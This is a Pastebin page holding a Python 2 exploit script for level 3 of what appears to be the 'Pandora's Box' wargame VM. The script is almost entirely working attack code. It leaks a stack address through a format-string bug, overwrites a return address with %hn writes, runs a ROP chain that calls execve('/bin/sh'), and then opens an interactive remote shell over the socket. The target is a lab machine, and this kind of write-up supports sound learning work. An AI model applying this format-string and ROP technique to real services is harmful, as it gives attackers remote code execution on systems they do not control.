API tools faq
paste
Advertisement
Guest User

Pandoras Box level3

a guest
Sep 17th, 2015
1,916
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.42 KB | None | 0 0
raw download clone embed print report
  1. # A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
  2. #
  3. # This approach is different and avoids dealing the stack cookies
  4. # Enjoy
  5.  
  6. import struct
  7. import socket
  8. import telnetlib
  9.  
  10.  
  11. REMOTE = '192.168.56.101'
  12. # REMOTE = '127.0.0.1'
  13. PORT   = 44101
  14.  
  15. mysocket = socket.socket()
  16. mysocket.connect((REMOTE, PORT))
  17.  
  18. # Obtain a leaked stack address
  19. mysocket.send('9999%08x' + '\n')
  20.  
  21. # Ensure all response data is returned
  22. while True:
  23.     data = mysocket.recv(1024)
  24.     addr_loc = data.find('9999')
  25.     if addr_loc is not -1:
  26.         break
  27.  
  28. addr = data[addr_loc+4:addr_loc+12]
  29. print "leaked stack address is " + addr
  30.  
  31. # Calculate offsets for the return address of the function "start_game"
  32. start_game_addr = int(addr, 16) - 48
  33. print "start_game address is  " + hex(start_game_addr)
  34.  
  35. # Calculate offset for the future "/bin/sh" string sent next
  36. bin_sh_addr = int(addr, 16) + 278
  37. print "bin_sh address is  " + hex(bin_sh_addr)
  38.  
  39. sploit = '9999'
  40.  
  41. sploit += struct.pack('<L', start_game_addr)        # Offsets for 0x080485af (start_game)
  42. # sploit += struct.pack('<L', 0xCCCCCCCC)       # Debug values
  43.  
  44. sploit += struct.pack('<L', start_game_addr + 2)    # Offsets for 0x080485af (start_game+2)
  45. # sploit += struct.pack('<L', 0xDDDDDDDD)       # Debug values
  46.  
  47. # Change return address from start_game to ROP bootstrap
  48. sploit += '%33521x%11$hn'               # 0x080a8308 - add esp,0x10c; ret
  49. sploit += '%34050x%12$hn'               # 0x080a8308 - add esp,0x10c; ret
  50.  
  51. sploit += '\x41' * 0xba                 # Padding because above we moved 0x10c 'up' the stack
  52.  
  53. # Zero eax
  54. sploit += struct.pack('<L', 0x0809807f)         # xor eax,eax; ret
  55.  
  56. # Zero ecx + set ebx with addr of '/bin/sh'
  57. sploit += struct.pack('<L', 0x080540cd)         # pop ecx; pop ebx; ret
  58. sploit += '\x00' * 4 + struct.pack('<L', bin_sh_addr)   # Address of /bin/sh
  59.  
  60. # Zero edx
  61. sploit += struct.pack('<L', 0x080540a6)         # pop edx; ret
  62. sploit += '\x00' * 4                    # set edx to 0
  63.  
  64. # Set eax to 11 (syscall for execve)
  65. # sploit += struct.pack('<L', 0xEEEEEEEE)       # Debug value
  66. sploit += struct.pack('<L', 0x0806ad3e) * 5     # inc eax; inc eax; ret
  67. sploit += struct.pack('<L', 0x0806ad3f)         # inc eax; ret
  68. sploit += struct.pack('<L', 0x08054820)         # int 0x80; ret
  69.  
  70. # And finally the '/bin/sh' string
  71. sploit += '////////////////bin/sh\x00'          # Padding then null terminated '/bin/sh'
  72.  
  73. # Bombs away
  74. mysocket.send(sploit)
  75.  
  76. # Drop into a interactive shell
  77. tn = telnetlib.Telnet()
  78. tn.sock = mysocket
  79. tn.interact()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!